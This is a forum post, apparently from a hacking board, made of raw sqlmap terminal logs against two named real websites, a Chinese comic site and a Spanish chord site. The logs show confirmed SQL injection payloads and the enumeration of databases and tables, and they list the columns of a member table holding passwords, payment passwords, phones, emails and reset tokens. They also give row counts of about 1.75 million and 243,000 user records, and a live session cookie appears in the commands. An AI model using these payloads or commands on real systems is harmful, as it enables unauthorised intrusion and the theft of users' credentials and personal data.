| qiswl_distribution                |
| qiswl_diyu                        |
| qiswl_duzhequn                    |
| qiswl_event                       |
| qiswl_event_avator                |
| qiswl_event_cw_member_word        |
| qiswl_event_time                  |
| qiswl_eventq                      |
| qiswl_eventq_result               |
| qiswl_exec_each_time              |
| qiswl_feedback                    |
| qiswl_feedback_item               |
| qiswl_feedback_navi               |
| qiswl_fenrun                      |
| qiswl_game_categories             |
| qiswl_game_item                   |
| qiswl_game_uid                    |
| qiswl_games                       |
| qiswl_games_event                 |
| qiswl_history                     |
| qiswl_indexlist                   |
| qiswl_indexmarquee                |
| qiswl_kuangren                    |
| qiswl_lanmu                       |
| qiswl_level_area                  |
| qiswl_logo                        |
| qiswl_manhua                      |
| qiswl_manhua_audit_tags           |
| qiswl_manhua_comment              |
| qiswl_manhua_comment_thumbs       |
| qiswl_manhua_comment_thumbs_down  |
| qiswl_manhua_dlsite               |
| qiswl_member                      |
| qiswl_member_chapter              |
| qiswl_member_comment_notice       |
| qiswl_member_exp_rec              |
| qiswl_member_gold_rec             |
| qiswl_member_last_login           |
| qiswl_member_notice               |
| qiswl_member_point                |
| qiswl_member_prize_list           |
| qiswl_member_statistics           |
| qiswl_member_sticker_set          |
| qiswl_member_test_regist          |
| qiswl_member_viplog               |
| qiswl_milktea_item                |
| qiswl_notice                      |
| qiswl_order                       |
| qiswl_order2                      |
| qiswl_ovh_chid                    |
| qiswl_payment                     |
| qiswl_prize_type                  |
| qiswl_pro                         |
| qiswl_record                      |
| qiswl_scratch_list                |
| qiswl_scratch_rec                 |
| qiswl_sign                        |
| qiswl_sticker                     |
| qiswl_sticker_set                 |
| qiswl_store_class                 |
| qiswl_store_class_sub             |
| qiswl_store_item                  |
| qiswl_subscribe                   |
| qiswl_system_error_log            |
| qiswl_system_login_log            |
| qiswl_system_operation_log        |
| qiswl_system_skin                 |
| qiswl_task                        |
| qiswl_task_event_record           |
| qiswl_task_record                 |
| qiswl_ticai                       |
| qiswl_tixian                      |
| qiswl_tuibo                       |
| qiswl_tuibo_message               |
| qiswl_tuibo_stat                  |
| qiswl_update_log                  |
+-----------------------------------+

[02:51:34] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 111 times
[02:51:34] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/boylove.cc'

[*] ending @ 02:51:34 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://boylove.cc/home/index/dailyupdate1/weekday/*/page/2"   --cookie="PHPSESSID=17781a2d5a230d756cb625fad04a700c; _clck=aa2yzv%5E2%5Efza%5E0%5E2082; _clsk=vnu668%5E1757754974429%5E31%5E0%5Ee.clarity.ms%2Fcollect; autoSignRs=1; bulletin_new_31=1; dark=N; history=%5B%7B%22manhua_id%22%3A31373%2C%22manhua_title%22%3A%22%5Cu7070%5Cu70ec%5Cu503e%5Cu8986%5Cu4e4b%5Cu6d77%22%2C%22manhua_image%22%3A%22%5C%2Fbookimages%5C%2Fimg%5C%2F20250817%5C%2F8ead0a501585076c15615518f0accd6b.webp%22%2C%22manhua_type%22%3A1%2C%22manhua_vipcanread%22%3A0%7D%5D; lang=CN; returnOct=true; rfv=https%3A%2F%2Fboylove.cc%2Fhome%2Fbook%2Findex%2Fid%2F; shunt=3; todayBrowseDay=true; todayBrowseMonth=true; type=1"   --technique=E   --dbms=mysql   --level=5   --risk=3   --batch -D bl_comic -T qiswl_member --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:52:03 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:52:03] [INFO] testing connection to the target URL
[02:52:03] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: https://boylove.cc/home/index/dailyupdate1/weekday/GTID_SUBSET(CONCAT(0x7171766a71,(SELECT (ELT(2720=2720,1))),0x71717a7071),2720)/page/2
---
[02:52:03] [INFO] testing MySQL
[02:52:03] [INFO] confirming MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[02:52:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[02:52:04] [INFO] fetching columns for table 'qiswl_member' in database 'bl_comic'
[02:52:04] [INFO] retrieved: 'id'
[02:52:05] [INFO] retrieved: 'int(12)'
[02:52:05] [INFO] retrieved: 'username'
[02:52:05] [INFO] retrieved: 'varchar(255)'
[02:52:06] [INFO] retrieved: 'nickname'
[02:52:06] [INFO] retrieved: 'varchar(255)'
[02:52:06] [INFO] retrieved: 'phone'
[02:52:06] [INFO] retrieved: 'varchar(255)'
[02:52:06] [INFO] retrieved: 'password'
[02:52:06] [INFO] retrieved: 'varchar(255)'
[02:52:07] [INFO] retrieved: 'encrypted_password'
[02:52:07] [INFO] retrieved: 'varchar(255)'
[02:52:07] [INFO] retrieved: 'paypass'
[02:52:07] [INFO] retrieved: 'varchar(255)'
[02:52:07] [INFO] retrieved: 'register_time'
[02:52:08] [INFO] retrieved: 'datetime'
[02:52:08] [INFO] retrieved: 'last_time'
[02:52:08] [INFO] retrieved: 'datetime'
[02:52:08] [INFO] retrieved: 'no_add_time'
[02:52:08] [INFO] retrieved: 'datetime'
[02:52:09] [INFO] retrieved: 'last_device_type'
[02:52:09] [INFO] retrieved: 'enum('','PC','M')'
[02:52:09] [INFO] retrieved: 'isvip_status'
[02:52:09] [INFO] retrieved: 'tinyint(4)'
[02:52:09] [INFO] retrieved: 'viptime'
[02:52:09] [INFO] retrieved: 'varchar(50)'
[02:52:10] [INFO] retrieved: 'headimage'
[02:52:10] [INFO] retrieved: 'varchar(255)'
[02:52:10] [INFO] retrieved: 'status'
[02:52:10] [INFO] retrieved: 'tinyint(4)'
[02:52:10] [INFO] retrieved: 'money'
[02:52:11] [INFO] retrieved: 'decimal(11,2)'
[02:52:11] [INFO] retrieved: 'score'
[02:52:11] [INFO] retrieved: 'int(11)'
[02:52:11] [INFO] retrieved: 'lv'
[02:52:11] [INFO] retrieved: 'tinyint(2)'
[02:52:11] [INFO] retrieved: 'pid'
[02:52:12] [INFO] retrieved: 'int(11)'
[02:52:12] [INFO] retrieved: 'path_id'
[02:52:12] [INFO] retrieved: 'varchar(255)'
[02:52:12] [INFO] retrieved: 'register_ip'
[02:52:12] [INFO] retrieved: 'varchar(255)'
[02:52:13] [INFO] retrieved: 'login_ip'
[02:52:13] [INFO] retrieved: 'varchar(255)'
[02:52:13] [INFO] retrieved: 'login_nums'
[02:52:13] [INFO] retrieved: 'int(11)'
[02:52:13] [INFO] retrieved: 'login_country'
[02:52:14] [INFO] retrieved: 'varchar(10)'
[02:52:14] [INFO] retrieved: 'useragent'
[02:52:14] [INFO] retrieved: 'varchar(255)'
[02:52:14] [INFO] retrieved: 'lang'
[02:52:14] [INFO] retrieved: 'enum('TW','CN')'
[02:52:15] [INFO] retrieved: 'type'
[02:52:15] [INFO] retrieved: 'tinyint(4)'
[02:52:15] [INFO] retrieved: 'lxqd'
[02:52:15] [INFO] retrieved: 'int(11)'
[02:52:15] [INFO] retrieved: 'is_agent'
[02:52:16] [INFO] retrieved: 'tinyint(1)'
[02:52:16] [INFO] retrieved: 'has_kou'
[02:52:16] [INFO] retrieved: 'int(11)'
[02:52:16] [INFO] retrieved: 'tj_kou'
[02:52:16] [INFO] retrieved: 'int(11)'
[02:52:16] [INFO] retrieved: 'myui'
[02:52:17] [INFO] retrieved: 'varchar(255)'
[02:52:17] [INFO] retrieved: 'sign_cnt'
[02:52:17] [INFO] retrieved: 'tinyint(4)'
[02:52:17] [INFO] retrieved: 'last_sign_time'
[02:52:17] [INFO] retrieved: 'int(11)'
[02:52:18] [INFO] retrieved: 'autoCheckDays'
[02:52:18] [INFO] retrieved: 'smallint(6)'
[02:52:18] [INFO] retrieved: 'sumCheckDays'
[02:52:18] [INFO] retrieved: 'smallint(6)'
[02:52:18] [INFO] retrieved: 'email'
[02:52:18] [INFO] retrieved: 'varchar(255)'
[02:52:19] [INFO] retrieved: 'email_verified'
[02:52:19] [INFO] retrieved: 'tinyint(1)'
[02:52:19] [INFO] retrieved: 'reset_token'
[02:52:19] [INFO] retrieved: 'varchar(255)'
[02:52:19] [INFO] retrieved: 'store_notice'
[02:52:19] [INFO] retrieved: 'varchar(20)'
[02:52:20] [INFO] retrieved: 'game_notice'
[02:52:20] [INFO] retrieved: 'varchar(10)'
[02:52:20] [INFO] retrieved: 'eventTest'
[02:52:20] [INFO] retrieved: 'tinyint(4)'
[02:52:20] [INFO] retrieved: 'vfystat'
[02:52:21] [INFO] retrieved: 'enum('0','1')'
[02:52:21] [INFO] retrieved: 'readCount'
[02:52:21] [INFO] retrieved: 'int(11)'
[02:52:21] [INFO] retrieved: 'readCountLastM'
[02:52:21] [INFO] retrieved: 'int(11)'
[02:52:21] [INFO] retrieved: 'limitVipEndTime'
[02:52:22] [INFO] retrieved: 'datetime'
[02:52:22] [INFO] retrieved: 'favTagKey'
[02:52:22] [INFO] retrieved: 'enum('0','1')'
[02:52:22] [INFO] retrieved: 'q_send_cnt'
[02:52:22] [INFO] retrieved: 'smallint(6)'
[02:52:23] [INFO] retrieved: 'q_corr_cnt'
[02:52:23] [INFO] retrieved: 'smallint(6)'
[02:52:23] [INFO] retrieved: 'avatar_using'
[02:52:23] [INFO] retrieved: 'mediumint(9)'
[02:52:23] [INFO] retrieved: 'mlevel'
[02:52:23] [INFO] retrieved: 'int(11)'
[02:52:24] [INFO] retrieved: 'mexp'
[02:52:24] [INFO] retrieved: 'int(11)'
[02:52:24] [INFO] retrieved: 'mgold'
[02:52:24] [INFO] retrieved: 'int(11)'
[02:52:24] [INFO] retrieved: 'mbookcount'
[02:52:24] [INFO] retrieved: 'smallint(6)'
[02:52:25] [INFO] retrieved: 'lostEmail'
[02:52:25] [INFO] retrieved: 'smallint(4)'
[02:52:25] [INFO] retrieved: 'showHintTag'
[02:52:25] [INFO] retrieved: 'varchar(10)'
[02:52:25] [INFO] retrieved: 'has_sent_lost_mail'
[02:52:26] [INFO] retrieved: 'tinyint(4)'
Database: bl_comic
Table: qiswl_member
[57 columns]
+--------------------+-------------------+
| Column             | Type              |
+--------------------+-------------------+
| status             | tinyint(4)        |
| type               | tinyint(4)        |
| autoCheckDays      | smallint(6)       |
| avatar_using       | mediumint(9)      |
| email              | varchar(255)      |
| email_verified     | tinyint(1)        |
| encrypted_password | varchar(255)      |
| eventTest          | tinyint(4)        |
| favTagKey          | enum('0','1')     |
| game_notice        | varchar(10)       |
| has_kou            | int(11)           |
| has_sent_lost_mail | tinyint(4)        |
| headimage          | varchar(255)      |
| id                 | int(12)           |
| is_agent           | tinyint(1)        |
| isvip_status       | tinyint(4)        |
| lang               | enum('TW','CN')   |
| last_device_type   | enum('','PC','M') |
| last_sign_time     | int(11)           |
| last_time          | datetime          |
| limitVipEndTime    | datetime          |
| login_country      | varchar(10)       |
| login_ip           | varchar(255)      |
| login_nums         | int(11)           |
| lostEmail          | smallint(4)       |
| lv                 | tinyint(2)        |
| lxqd               | int(11)           |
| mbookcount         | smallint(6)       |
| mexp               | int(11)           |
| mgold              | int(11)           |
| mlevel             | int(11)           |
| money              | decimal(11,2)     |
| myui               | varchar(255)      |
| nickname           | varchar(255)      |
| no_add_time        | datetime          |
| password           | varchar(255)      |
| path_id            | varchar(255)      |
| paypass            | varchar(255)      |
| phone              | varchar(255)      |
| pid                | int(11)           |
| q_corr_cnt         | smallint(6)       |
| q_send_cnt         | smallint(6)       |
| readCount          | int(11)           |
| readCountLastM     | int(11)           |
| register_ip        | varchar(255)      |
| register_time      | datetime          |
| reset_token        | varchar(255)      |
| score              | int(11)           |
| showHintTag        | varchar(10)       |
| sign_cnt           | tinyint(4)        |
| store_notice       | varchar(20)       |
| sumCheckDays       | smallint(6)       |
| tj_kou             | int(11)           |
| useragent          | varchar(255)      |
| username           | varchar(255)      |
| vfystat            | enum('0','1')     |
| viptime            | varchar(50)       |
+--------------------+-------------------+

[02:52:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 118 times
[02:52:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/boylove.cc'

[*] ending @ 02:52:26 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://boylove.cc/home/index/dailyupdate1/weekday/*/page/2"   --cookie="PHPSESSID=17781a2d5a230d756cb625fad04a700c; _clck=aa2yzv%5E2%5Efza%5E0%5E2082; _clsk=vnu668%5E1757754974429%5E31%5E0%5Ee.clarity.ms%2Fcollect; autoSignRs=1; bulletin_new_31=1; dark=N; history=%5B%7B%22manhua_id%22%3A31373%2C%22manhua_title%22%3A%22%5Cu7070%5Cu70ec%5Cu503e%5Cu8986%5Cu4e4b%5Cu6d77%22%2C%22manhua_image%22%3A%22%5C%2Fbookimages%5C%2Fimg%5C%2F20250817%5C%2F8ead0a501585076c15615518f0accd6b.webp%22%2C%22manhua_type%22%3A1%2C%22manhua_vipcanread%22%3A0%7D%5D; lang=CN; returnOct=true; rfv=https%3A%2F%2Fboylove.cc%2Fhome%2Fbook%2Findex%2Fid%2F; shunt=3; todayBrowseDay=true; todayBrowseMonth=true; type=1"   --technique=E   --dbms=mysql   --level=5   --risk=3   --batch -D bl_comic -T qiswl_member --count
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:52:57 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:52:57] [INFO] testing connection to the target URL
[02:52:57] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: https://boylove.cc/home/index/dailyupdate1/weekday/GTID_SUBSET(CONCAT(0x7171766a71,(SELECT (ELT(2720=2720,1))),0x71717a7071),2720)/page/2
---
[02:52:57] [INFO] testing MySQL
[02:52:57] [INFO] confirming MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[02:52:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[02:52:58] [INFO] retrieved: '1752753'
Database: bl_comic
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| qiswl_member | 1752753 |
+--------------+---------+

[02:52:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 4 times
[02:52:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/boylove.cc'

[*] ending @ 02:52:58 /2025-09-14/

MrDark · 14.09.2025

Код:

Database: lc_ubase
+----------+---------+
| Table    | Entries |
+----------+---------+
| usuarios | 243328  |
+----------+---------+


(myenv) root@E02S29:~# sqlmap -u "https://lacuerda.net/Evolucion/petiz/jump.php?rcode=*" \
  --dbms=mysql \
  --level=5 \
  --risk=3 \
  --batch \
  --flush-session \
  --dbs --random-agent
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:55:34 /2025-09-14/

[02:55:34] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.0 Safari/534.24' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:55:34] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:55:34] [INFO] testing connection to the target URL
[02:55:35] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:55:35] [INFO] testing if the target URL content is stable
[02:55:36] [INFO] target URL content is stable
[02:55:36] [INFO] testing if URI parameter '#1*' is dynamic
[02:55:36] [WARNING] URI parameter '#1*' does not appear to be dynamic
[02:55:36] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[02:55:37] [INFO] testing for SQL injection on URI parameter '#1*'
[02:55:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:56:16] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[02:56:49] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[02:56:52] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
[02:56:52] [INFO] testing 'Generic inline queries'
[02:56:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:56:53] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[02:56:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:56:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:56:54] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[02:56:54] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[02:56:55] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:56:55] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:56:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:56:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:56:56] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[02:56:56] [INFO] testing 'MySQL inline queries'
[02:56:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:56:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:56:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:56:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[02:56:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:56:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[02:56:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:56:59] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[02:57:09] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)' injectable
[02:57:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:57:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:57:10] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[02:57:12] [INFO] target URL appears to have 15 columns in query
[02:57:14] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[02:57:14] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[02:57:14] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 238 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR NOT 9497=9497-- VyhH

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 1528 FROM(SELECT COUNT(*),CONCAT(0x7162627071,(SELECT (ELT(1528=1528,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MCuM

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 3325 FROM (SELECT(SLEEP(5)))XxQf)-- rbJf

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' UNION ALL SELECT NULL,CONCAT(0x7162627071,0x4b67526753465946527855486c624a50736176684a5449504c764b79476663475671737246795253,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[02:57:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.6.40
back-end DBMS: MySQL >= 5.0
[02:57:17] [INFO] fetching database names
[02:57:18] [INFO] retrieved: 'information_schema'
[02:57:18] [INFO] retrieved: 'lc_comunidad'
[02:57:19] [INFO] retrieved: 'lc_dbase'
[02:57:19] [INFO] retrieved: 'lc_topsites'
[02:57:20] [INFO] retrieved: 'lc_ubase'
available databases [5]:
[*] information_schema
[*] lc_comunidad
[*] lc_dbase
[*] lc_topsites
[*] lc_ubase

[02:57:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/lacuerda.net'

[*] ending @ 02:57:20 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://lacuerda.net/Evolucion/petiz/jump.php?rcode=*"   --dbms=mysql   --level=5   --risk=3   --batch     --random-agent -D lc_ubase --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:57:52 /2025-09-14/

[02:57:52] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; cs-CZ) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.29' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:57:52] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:57:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR NOT 9497=9497-- VyhH

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 1528 FROM(SELECT COUNT(*),CONCAT(0x7162627071,(SELECT (ELT(1528=1528,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MCuM

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 3325 FROM (SELECT(SLEEP(5)))XxQf)-- rbJf

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' UNION ALL SELECT NULL,CONCAT(0x7162627071,0x4b67526753465946527855486c624a50736176684a5449504c764b79476663475671737246795253,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[02:57:53] [INFO] testing MySQL
[02:57:53] [INFO] confirming MySQL
[02:57:55] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Apache
back-end DBMS: MySQL >= 5.0.0
[02:57:55] [INFO] fetching tables for database: 'lc_ubase'
[02:57:56] [INFO] retrieved: 'amigos'
[02:57:56] [INFO] retrieved: 'appfavs'
[02:57:57] [INFO] retrieved: 'bandas'
[02:57:57] [INFO] retrieved: 'canciones'
[02:57:58] [INFO] retrieved: 'chordbase'
[02:57:58] [INFO] retrieved: 'colabs'
[02:57:58] [INFO] retrieved: 'coms'
[02:57:59] [INFO] retrieved: 'enlaces'
[02:57:59] [INFO] retrieved: 'favlists'
[02:57:59] [INFO] retrieved: 'favs'
[02:58:00] [INFO] retrieved: 'geografia'
[02:58:00] [INFO] retrieved: 'nuevas'
[02:58:01] [INFO] retrieved: 'perfiles'
[02:58:01] [INFO] retrieved: 'peticiones'
[02:58:01] [INFO] retrieved: 'socios'
[02:58:02] [INFO] retrieved: 'trans'
[02:58:02] [INFO] retrieved: 'ultimedia'
[02:58:02] [INFO] retrieved: 'usuarios'
[02:58:03] [INFO] retrieved: 'vidcolabs'
[02:58:03] [INFO] retrieved: 'videos'
[02:58:03] [INFO] retrieved: 'vidvotos'
[02:58:04] [INFO] retrieved: 'votos'
Database: lc_ubase
[22 tables]
+------------+
| amigos     |
| appfavs    |
| bandas     |
| canciones  |
| chordbase  |
| colabs     |
| coms       |
| enlaces    |
| favlists   |
| favs       |
| geografia  |
| nuevas     |
| perfiles   |
| peticiones |
| socios     |
| trans      |
| ultimedia  |
| usuarios   |
| vidcolabs  |
| videos     |
| vidvotos   |
| votos      |
+------------+

[02:58:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/lacuerda.net'

[*] ending @ 02:58:04 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://lacuerda.net/Evolucion/petiz/jump.php?rcode=*"   --dbms=mysql   --level=5   --risk=3   --batch     --random-agent -D lc_ubase -T usarios --columns
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.9#pip}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:58:44 /2025-09-14/

[02:58:44] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:58:44] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:58:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR NOT 9497=9497-- VyhH

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 1528 FROM(SELECT COUNT(*),CONCAT(0x7162627071,(SELECT (ELT(1528=1528,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MCuM

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 3325 FROM (SELECT(SLEEP(5)))XxQf)-- rbJf

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' UNION ALL SELECT NULL,CONCAT(0x7162627071,0x4b67526753465946527855486c624a50736176684a5449504c764b79476663475671737246795253,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[02:58:45] [INFO] testing MySQL
[02:58:45] [INFO] confirming MySQL
[02:58:46] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.0
[02:58:46] [INFO] fetching columns for table 'usarios' in database 'lc_ubase'
